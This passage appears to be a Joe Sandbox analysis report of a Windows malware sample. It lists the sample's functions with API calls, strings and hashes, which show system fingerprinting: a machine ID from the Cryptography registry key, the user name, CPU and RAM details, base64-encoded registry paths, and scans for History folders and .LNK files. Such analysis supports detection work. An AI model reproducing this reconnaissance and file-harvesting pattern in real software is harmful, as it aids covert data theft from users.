CheckTokenMembership.KERNELBASE(00000000,00000000,?), ref: 00407CEC
FreeSid.ADVAPI32(00000000,00407D1D), ref: 00407D10

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AccountCheckFreeLookupMembershipToken
String ID:
API String ID: 1602037265-0
Opcode ID: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction ID: 099d520652cb879bdf47a43f009fc20e3076d83f6f5b891ba4a5cda1263a2b72
Opcode Fuzzy Hash: 2fd40f1cd6d938c6e5d16d2cd6dc980c4c8d1b789cf8552ef7046a50898a570f
Instruction Fuzzy Hash: 7821A475A04209AFDB41CFA8DC51FEEB7F8EB48700F104466EA14E7290E775AA01DBA5

Function 004040F4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

Strings

SOFTWARE\Microsoft\Cryptography, xrefs: 00404101

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AllocString
String ID: SOFTWARE\Microsoft\Cryptography
API String ID: 2525500382-1514646153
Opcode ID: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
Instruction ID: 809722c095ea45080b132ee1ecccaea0ad8e4e48b5b2181e80121cad3d0a43f6
Opcode Fuzzy Hash: 6827334effe1af4081dab58951797ab719276b71555c5be752b1280ab307ebe8
Instruction Fuzzy Hash: E6D012F42001025AD7489F198555A37776E5BD1700368C6BEA101BF2D5DB39E841EB34

Function 00407B78 Relevance: 3.1, APIs: 2, Instructions: 84
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CheckFreeMembershipToken
String ID:
API String ID: 3914140973-0
Opcode ID: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
Instruction ID: aed4e80559fb2a14190837efd407bda22eaf0f983d9af5a1b784dce0b7ff3491
Opcode Fuzzy Hash: 02d2a01e1651f1c233edb1ebec011e8a64dd2af6dca5e3f4e19433a4a010ba8d
Instruction Fuzzy Hash: 60214F75A48388BEE701DBA8CC41FAE77FCEB09704F4084B6E610E3291D775AA098759

Function 00407B77 Relevance: 3.1, APIs: 2, Instructions: 80
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000000,00407C46), ref: 00407C19
FreeSid.ADVAPI32(00000000,00407C4D), ref: 00407C40

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: CheckFreeMembershipToken
String ID:
API String ID: 3914140973-0
Opcode ID: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
Instruction ID: f84fb7a27dacd8e4143a25a8c882f6f2bfcd0e0861e01e35ab8e7fc80b6cb224
Opcode Fuzzy Hash: 85f5b30b1e39150e1c8e346ace12111ea4b56de602e113dca3c1568075f88dab
Instruction Fuzzy Hash: 0A216075A48248BEE701CBA8CC81FAE77F8EB0D704F5084B6F610E36D1D775AA058B59

Function 00407500 Relevance: 3.1, APIs: 2, Instructions: 76
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020019,?), ref: 00407582
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000001,00000000,000000FE), ref: 004075A9

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: AllocOpenQueryStringValue
String ID:
API String ID: 4139485348-0
Opcode ID: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction ID: a534eb6d79e9af16e12b264bd48d331209bfd9d9316274433d90d6d6e5d4440a
Opcode Fuzzy Hash: 3ed5b2ee1dba194cc6dbe336fcadb55ada54ae4c4b70a41d90ff88955bf18e37
Instruction Fuzzy Hash: 1921C771A04109AFD700EB99CD81EEEBBFCEB48304F504576B904E7691D774AE448A65

Function 004033F4 Relevance: 3.1, APIs: 2, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
Instruction ID: 759013028fc8479fd2dc72d2fd20690e0ff356ad8f398ebd0a8dd26c183a4070
Opcode Fuzzy Hash: 8728ad655b3e503d2fdb3a62f9eb409c209a4d433934cda3c6acf7bd146207aa
Instruction Fuzzy Hash: 532162709002408BDB229F6584847577FD9AB49356F2585BBE844AF2C6D77CCEC0C7AD

Function 004033EC Relevance: 3.1, APIs: 2, Instructions: 66
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
Instruction ID: 6a24a9e445b26bd493014d0ae565dbad687ffc3c4e0e672e3f19fd4d116e45a8
Opcode Fuzzy Hash: 12e1264d31eb56f2234adc36a07824a312904d80612c0ba461cf097056190f6f
Instruction Fuzzy Hash: 082132709002408FDB229F6584847567FE9AF49316F1585BBE844AE2D6D77CCEC0C799

Function 004033F0 Relevance: 3.1, APIs: 2, Instructions: 64
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00400000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 00403479
ExitProcess.KERNEL32(00000000,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000,00402568,?,00403505,?,0041913B,00000000), ref: 004034AE

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: ExitFreeLibraryProcess
String ID:
API String ID: 1404682716-0
Opcode ID: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
Instruction ID: 27f7e017d1627fb368da8b77f9887733e34b03074980a547fb73b729214f25e1
Opcode Fuzzy Hash: 48b7e33afc810a21c896a39620d19b1e342ee901d510fcbf56cb23baece62cc7
Instruction Fuzzy Hash: A42141709002408BDB229F6584847577FE9AF49316F2585BBE844AE2C6D77CCEC0CB9D

Function 00406DA8 Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction ID: d76901b39ac324b957afaa178e8467113ca23e905bfc9c7565385042a447591e
Opcode Fuzzy Hash: 42e8ac0eb481dbdee281ab6c948f954a5f7be2f1dbc7aad8dbdbf02e747b1a52
Instruction Fuzzy Hash: 4E110A71600209AFD700EB99C991ADEBBFCEB48304F504176B504E3291D774AF048AA5

Function 00406DAC Relevance: 3.1, APIs: 2, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004040F4: SysAllocStringLen.OLEAUT32(SOFTWARE\Microsoft\Cryptography,?), ref: 00404102

RegOpenKeyExW.KERNEL32(80000002,00000000,00000000,00020119,?), ref: 00406E08
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,00000000,000000FE), ref: 00406E2F

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: String$AllocFreeOpenQueryValue
String ID:
API String ID: 967375698-0
Opcode ID: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction ID: 82cb5f20ed390e82a860d028ca805bd23af48b7bdc57f11f8f6bbfe72b4b229b
Opcode Fuzzy Hash: 2211f0de82845023bd4461a93eb36700242ae8860f2016ef3c98de18d7d5de81
Instruction Fuzzy Hash: 0211EC75600209AFD701EB99CD81EDEBBFCEB48704F504576B504F3291DB74AF448AA5

Function 00401388 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013B7
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00401691), ref: 004013DE

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction ID: a459bd48843060549903651ed84add4fd647ab7a4347e8b1aec55fdbd67c2c02
Opcode Fuzzy Hash: b25dbc278243e52bedcd7f6d8fef46cdb2f3eea21510b30c666f455eef3dc6e8
Instruction Fuzzy Hash: 72F0E972B0032017EB2055690CC1F5265C58B46760F14417BBE08FF7D9C6758C008299

Function 004065C4 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
Instruction ID: cd992ebe0347ba42bda0945abe6e894bfe88d76707d831bffa21c0f3d5584e5e
Opcode Fuzzy Hash: 1ebdfbd59a0e52ef2ea023c9a08e44020ac5f15f939b277ac4f00344f859253b
Instruction Fuzzy Hash: 29E04FB12082425FD312EB98D880AA677E59F89300F05487AA885C72E1EE35DE649B57

Function 004065C8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetUserNameW.ADVAPI32(?,?,?,00406CB6,00000000,00406D93,?,?,00000006,00000000,00000000,?,00419172,?), ref: 004065E9

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: NameUser
String ID:
API String ID: 2645101109-0
Opcode ID: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
Instruction ID: 47af1fdf1995f1dddaec203f3ca82799803cb6e69f4b63bfcad29cffb6660ea3
Opcode Fuzzy Hash: c1aec3d96d918917163645e1cef9db84c357628eb7c3e8a5af25ed4d30638381
Instruction Fuzzy Hash: D9E08CB12042025BE310EA98D880AA6B2D89F88300F01483AB889C73D0FE39DE648A57

Function 00403604 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000003,00000000,?,?,00000000,00000001,00000000,00000000,00000001,004036B0,00000000), ref: 0040361A

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide
String ID:
API String ID: 626452242-0
Opcode ID: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction ID: 7e1ccd6cea493bd3454663dff710d39ec61ca1bdc7a044e150527f2c3e7482f1
Opcode Fuzzy Hash: 561e95d8c0e043bb599fe2914a8b8ce540b10e76985e8275bf81900a008061d5
Instruction Fuzzy Hash: 1EC002B22802087FE5149A9ADC46FA7769C9758B50F108029B7089E1D1D5A5B85046BC

Function 00401464 Relevance: 1.3, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(FFFFFFFF,00000000,00008000), ref: 004014C8

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction ID: bdb72b2e4f8392e9a4367bae485781504843fed35f2e07c9585e1bdde9d69fdb
Opcode Fuzzy Hash: 8487bf62bb6a208eaaff7636571d42378b79c596feb4fea81bccde4a3e3226a5
Instruction Fuzzy Hash: 2621F770608710AFC710DF19C8C0A5BBBE5EF85760F14C96AE4989B3A5D378EC41CB9A

Function 004015B0 Relevance: 1.3, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(00000000,00000000,00004000,?,0000000C,?,-00000008,00003FFB,00401817), ref: 0040160A

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction ID: 104411973d7795ae4b76250d277c099600c8cf09cd5a8da0f47b470ca133b76a
Opcode Fuzzy Hash: 3bfc56920760e5136ff02f6c94c05418cc55e2be2e85163925a7dedac6e01034
Instruction Fuzzy Hash: 82012B726443105FC3109F28DDC0E6A77E5DBC5324F19493EDA85AB391D33B6C0187A8

Non-executed Functions

Function 00414408 Relevance: 16.2, APIs: 4, Strings: 5, Instructions: 496fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,?,0041A69E), ref: 004145C5

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Strings

0_@, xrefs: 00414BBB, 00414BD1
CA, xrefs: 004144DA, 00414580, 00414A89, 00414BEC
._., xrefs: 0041485D
.LNK, xrefs: 00414788
LLA, xrefs: 00414C04

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FreeString$FileFindFirst
String ID: .LNK$._.$0_@$LLA$CA
API String ID: 1653790112-882170572
Opcode ID: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
Instruction ID: 9c4ae2fa8e47753b2fad7318643bbdaa039e98a1c6b9804601cb0bccf78cece1
Opcode Fuzzy Hash: eabfcec7a1b34a96f3a487c33c476ef2dae85da7546450ac9a0750b76edb40a6
Instruction Fuzzy Hash: 6A224374A0011E9BCB10EF55C985ADEB7B9EF84308F1081B7E504B7296DB38AF858F59

Function 00416740 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C

Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E

Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB

Strings

SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==, xrefs: 004167A8
Video Info, xrefs: 00416856
CPU Model: , xrefs: 0041677E
CPU Count: , xrefs: 004167EF
UHJvY2Vzc29yTmFtZVN0cmluZw==, xrefs: 0041678C
GetRAM: , xrefs: 00416833

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FreeString$InfoSystem
String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
API String ID: 4070941872-1038824218
Opcode ID: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
Instruction ID: ec5783c0b7ca42e81122729fbed3a1ddf4b85dfc6774dd9c704540b43fb157b1
Opcode Fuzzy Hash: 994227d9c169a1dbbd8c134888da1df913b25c71fc93550dee7adeb46b23c78b
Instruction Fuzzy Hash: 64411270A1010D9BDB01FFD1D882ADDBBB9EF48309F51403BF504B7296D639EA458B59

Function 00404C15 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41threadCOMMON

Download Yara Rule

APIs

Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5

GetCommandLineA.KERNEL32 ref: 00404C7B
GetVersion.KERNEL32 ref: 00404C8F
GetVersion.KERNEL32 ref: 00404CA0
GetCurrentThreadId.KERNEL32 ref: 00404CDC

Part of subcall function 00402AC4: RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
Part of subcall function 00402AC4: RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F

GetThreadLocale.KERNEL32 ref: 00404CBC

Part of subcall function 00404B4C: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404BB2), ref: 00404B72

Strings

`%`, xrefs: 00404C80

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: KeyboardLocaleThreadTypeVersion$CloseCommandCurrentInfoLineOpenQueryValue
String ID: `%`
API String ID: 3734044017-316121997
Opcode ID: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction ID: 5abcdb9b335a34f550fa88bee7db3b3d0fbbcc1143cdfce7353ba034968c2f47
Opcode Fuzzy Hash: f73d26185257f265a94a8c873c422c92913b77d5a1c3acb43c070b40e0b1affb
Instruction Fuzzy Hash: C30112B0895341D9E714BFF29C863893E60AB89348F11C53FD2506A2F2D77D44449BAE

Function 00412D70 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 159fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,00412FE0,?,00000000,0041B0FC,00000000,00000050,00000000,00000000,?,?,0041335C,00000000,00000000), ref: 00412E08

Strings

.txt, xrefs: 00412F18
\History, xrefs: 00412EAE
\*.*, xrefs: 00412DEF

Memory Dump Source

Source File: 00000000.00000002.1701573868.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701562368.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701589248.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701600382.000000000041E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Oggq2dY6kx.jbxd

Yara matches

Similarity

API ID: FileFindFirst
String ID: .txt$\*.*$\History
API String ID: 1974802433-2232271174
